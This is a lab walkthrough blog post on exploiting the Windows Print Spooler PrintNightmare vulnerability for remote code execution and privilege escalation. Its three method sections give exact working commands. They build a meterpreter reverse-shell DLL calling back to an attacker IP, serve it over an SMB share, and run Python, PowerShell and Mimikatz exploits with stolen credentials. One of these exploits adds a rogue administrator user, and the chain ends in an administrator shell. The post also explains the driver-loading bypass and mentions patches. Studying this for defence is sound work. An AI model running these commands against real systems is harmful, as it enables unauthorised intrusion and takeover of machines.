Windows Privilege Escalation: PrintNightmare
Introduction
Print Spooler has been on researcher’s radar ever since Stuxnet worm used print spooler’s privilege escalation vulnerability to spread through the network in nuclear enrichment centrifuges of Iran and infected more than 45000 networks. PrintNightmare is the common name given to a Remote Code Execution vulnerability in the Print Spooler service (spoolsv.exe) in Microsoft Windows Operating Systems. The vulnerability was assigned CVE-2021-34527. Initially, it was thought of as a Local Privilege Escalation (LPE) and assigned CVE-2021-1675. Immediate patches for the LPE were released in June 2021 and was marked low severity. About 2 weeks later, Microsoft changed the low severity status of LPE to severe as it was found that patches were bypassed and Remote Code Execution achieved CVE-2021-34527 assigned. There was a controversy after a misunderstanding between the authors and Microsoft where the RCE exploit got released on GitHub before the patches, making it a 0-day vulnerability. However, it was immediately rolled back. In this article, we will be focusing on Privilege Escalation using this Print Spooler vulnerability. The traction it got in 2021 made it vulnerability of the year.
Related CVEs:
Vulnerability Type Remote Code Execution
Severity High
Base CVSS Score 9.3
Versions Affected Windows_10:20h2, Windows_10:21h1, Windows_10:1607,
Windows_10:1809, Windows_10:1909, Windows_10:2004,
Windows_7sp1, Windows_8.1, Windows_rt_8.1,
Windows_Server_2008, Windows_Server_2008,
Windows_Server_2012, Windows_Server_2012:r2,
Windows_Server_2016, Windows_Server_2016:20h2,
Windows_Server_2016:2004, Windows_Server_2019
Vulnerability Type Local Privilege Escalation
Severity High
Base CVSS Score 9.3
Versions Affected Windows_10:20h2, Windows_10:21h1, Windows_10:1607,
Windows_10:1809, Windows_10:1909, Windows_10:2004,
Windows_7sp1, Windows_8.1, Windows_rt_8.1,
Windows_Server_2008, Windows_Server_2008,
Windows_Server_2012, Windows_Server_2012:r2,
Windows_Server_2016, Windows_Server_2016:20h2,
Windows_Server_2016:2004, Windows_Server_2019
Related Advisories:
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-34527
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675
Table of Content
- Print Spooler Basics
- Vulnerability Summary
- Vulnerability Flow
- Machine IPs
- Method 1 – PrintNightmare RCE using Python
- Method 2 – PrintNightmare LPE using Powershell
- Method 3 – Printnightmare LPE using Mimikatz
- Patch Status
- Conclusion
Print Spooler Basics
Print spooler is the primary printing process interface. It is a built-in EXE file that is loaded at system startup itself. The workflow of a printing process is as follows:
Application: The print application creates a print job by calling Graphics Device Interface (GDI).
GDI: GDI includes both user-mode and kernel-mode components for graphics support.
winspool.drv is the interface that talks to the spooler. It provides the RPC stubs required to access the server.
spoolsv.exe is the spooler’s API server. This module implements message routing to print provider with the help of router (spoolss.dll)
spoolss.dll determines which print provider to call, based on a printer name and passes function call to the correct provider.
Vulnerability Summary
MS-RPRN protocol (Print System Remote Protocol) has a method RpcAddPrinterDriverEx() which allows remote driver installation by users with the SeLoadDriverPrivilege right. This right is only with users in Administrator group. So, the exploit tries to bypass this authentication in RpcAddPrinterDriver. Technique given by afwu.
Cube0x0 tweeted that he was able to achieve the same results by exploiting MS-PAR protocol’s RpcAsyncAddPrinterDriver() method which is similar to RpcAddPrinterDriver and loads drivers remotely. Technique can be found here.
We will use both these techniques in this demonstration article.
Vulnerability Flow
To understand the vulnerability flow, lets understand working of RpcAddPrinterDriver first. The steps are as follows:
- Add a Printer Driver to a Server call (RpcAddPrinterDriver)
- Client (Attacker) creates a share with printer driver files accessible
- Client (attacker) crafts an MS-RPRN (Print System Remote Protocol) Driver container which has DRIVER_INFO_2 in it. (basically, these are variables that contain path of DLLs, type of architecture etc.)
- Client (Attacker) calls:
RpcAddPrinterDriver(“<name of print server>”, DriverContainer);
Security Check: When the client will call this function, system checks if the client has “SeLoadDriverPrivilege” which is by default given to administrators group.
Bypassing Security Check: AFWU mentioned in his original writeup that a user can supply the following parameters in the spooler service:
pDataFile =A.dll
pConfigFile =B.dll
pDriverPath=C.dll
Spooler service will copy A,B,C DLL files in C:\Windows\System32\spool\drivers\x64\3\new and then load them to C:\Windows\System32\spool\drivers\x64\3
He further elaborates that for pDataFile and pDriverPath there is a check in Windows that these DLLs can’t be a UNC path. But pConfigFile can be a UNC path and therefore an attacker can do the following:
pDataFile =A.dll
pConfigFile =\\attacker_share\evil.dll
pDriverPath=C.dll
Which in theory would force Windows to load evil.dll from an attacker’s share.
Thus, the authentication bypass happens as follows:
- RpcAddPrinterDriver is called with suggested parameters and a UNC path leading to malicious DLL
- Malicious DLL is copied in C:\Windows\System32\spool\drivers\x64\3\evil.dll
- But this raises an access conflict so, we invoke Driver backup function and copy old drivers (including our malicious DLL) to the directory C:\Windows\System32\spool\drivers\x64\3\old\1\
- Replace pConfigFile path to DLL to this C:\Windows\System32\spool\drivers\x64\3\old\1\evil.dll path
- Access restriction is now bypassed and DLL loaded into spoolsv.exe successfully
This was elaborated in his writeup on Github which was removed. However, if you start your engines and travel your “wayback” into the time, you might be able to find it here 🙂
And the above stated process is the fundamental mechanism behind the working of exploits we will see in this article.
Machine IPs
Throughout the demo, following IP addresses have been taken:
Attacker IP: 192.168.1.2
Victim IP: 192.168.1.190
Compromised Credentials used: ignite/123
Method 1 – PrintNightmare RCE using Python
This is the method pertaining to CVE-2021-34527 (remote code execution as admin). You can find Cube0x0’s official PoC here. We will be using a forked version here.
First, we need to create a malicious DLL file which would run as ADMINISTRATOR. We use msfvenom for this.
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.2 lport=4444 -f dll -o evil.dll
Now, we can check if the target is vulnerable or not using metasploit’s auxiliary module. Here, I have entered a random path for DLL_PATH argument as I am not running the exploit, I just have to scan. In our testing, we found Metasploit’s printnightmare to be unreliable and hence, we are not showing this technique here. You can test it on your own and see if it works for you though. This run confirmed that victim is vulnerable to printnightmare.
use auxiliary/admin/dcerpc/cve_2021_1675_printnightmare set RHOSTS 192.168.1.190 set SMBUser ignite set SMBPass 123 set DLL_PATH / exploit
We now start a handler beforehand prior to executing our DLL file using the exploit.
use multi/handler set payload windows/x64/meterpreter/reverse_tcp set LHOST 192.168.1.2 set LPORT 4444 exploit
Now, we need to clone the github repo. We are using a forked version of Cube0x0’s original exploit.
git clone https://github.com/nemo-wq/PrintNightmare-CVE-2021-34527 cd PrintNightmare-CVE-2021-34527 chmod 777 CVE-2021-34527.py
Alright, one last step remaining is to host the malicious DLL in our SAMBA server. You can set up a samba server manually in Kali, use Windows host to host this or the easier approach is to use impacket’s smbserver.
Add the share name you want (in my case, “share” is used) and then supply the path (in my case, /root) where you have saved the malicious DLL.
python3 /usr/share/doc/python3-impacket/examples/smbserver.py share /root
With everything prepped up and ready, we can launch the RCE exploit. The execution is simple
./exploit.py credentials@IP ‘UNC_PATH of DLL hosted’
Here, we just launched a share on impacket, we will use that as the UNC path
./CVE-2021-34527.py ignite:123@192.168.1.190 '\\192.168.1.2\share\evil.dll'
As you can see, the victim has successfully executed our DLL file and returned us an administrator level session on the victim!
Method 2 – PrintNightmare LPE using Powershell
We have seen the remote exploit pertaining to CVE 2021-34527. Now, we will see the older local privilege escalation exploit. AFWU had implemented the original exploit in C plus plus while Caleb Stewart and John Hammond created a working PoC in powershell. Unlike the traditional exploit, this version doesn’t need an attacker to create SMB server in order to exploit. Instead of a remote UNC path injection, authors create a standalone DLL in temp directory and do a local UNC path injection.
git clone https://github.com/calebstewart/CVE-2021-1675.git cd CVE-2021-1675 && ls -al
Now, once the victim is compromised, we can upload this ps1 file in \Users\Public directory using IWR and setting up a python http server in the CVE-2021-1675 directory.
cd CVE-2021-1675 python3 -m http.server 80 powershell wget http://192.168.1.2/CVE-2021-1675.ps1 -O \Users\Public\cve.ps1 cd C:\Users\Public dir
Now, we can execute this ps1 file using powershell. This powershell script will help us in adding a new user in the administrator group using the credentials specified. For that, we need to spawn interactive powershell and Invoke the module like so:
powershell -ep bypass Import-Module .\cve.ps1 Invoke-Nightmare -NewUser "harsh" -NewPassword "123" -DriverName "PrintMe"
As you can see, the script has made a custom DLL that adds a new user “harsh” with password 123 in admin group and the script has exploited print spool.
net localgroup administrator
We can confirm this by logging in to the victim using psexec.
python3 psexec.py harsh:123@192.168.1.190
We are able to log in with the credentials and can confirm using net user command that harsh is infact a member of administrators now.
Method 3 – Printnightmare LPE using Mimikatz
When the PoC came on the internet, a new mimikatz plugin got added as a ritual in the misc section (misc::printnightmare). To exploit using mimikatz, we will use our existing DLL file “evil.dll” and also, we need our SMBserver running on the existing configuration. Now, we will download mimikatz.exe on our kali and start python HTTP server.
python3 -m http.server 80 powershell wget http://192.168.1.2/mimikatz.exe -O \users\Public\mimikatz.exe misc::printnightmare /library:\\192.168.1.2\share\evil.dll /authuser:ignite /authpassword:123 /try:50
As mimikatz has confirmed the execution has been successful. It throws an exception (probably because of some characters in the DLL) but the DLL has worked anyway and a reverse shell has been received on multi/handler.
Make sure to set up a handler on Metasploit before running this command. If everything goes right, you shall see a reverse shell!
And thus, we have conducted privilege escalation by exploiting PrintNightmare vulnerability.
Patch Status
Microsoft released out of band patches to deal with this vulnerability which can be found on the MSRC bulletin advisory mentioned in the introduction. Furthermore, system admins should consider disabling point and print functionality and disabling printing on users where it is not necessary.
Conclusion
Due to the nature of this vulnerability and ease of exploitation, PrintNightmare is a severe vulnerability that got a de-facto vulnerability of the year award in 2021. Many newer exploits have arised since then that target spoolsv.exe and despite all the efforts by Microsoft, patches are getting bypassed and so, it is highly recommended that analysts stay aware of upcoming threats to Print Spooler and keep their monitoring definitions updated. Hope you liked the article. Thanks for reading.
Author: Harshit Rajpal is an InfoSec researcher and left and right brain thinker. Contact here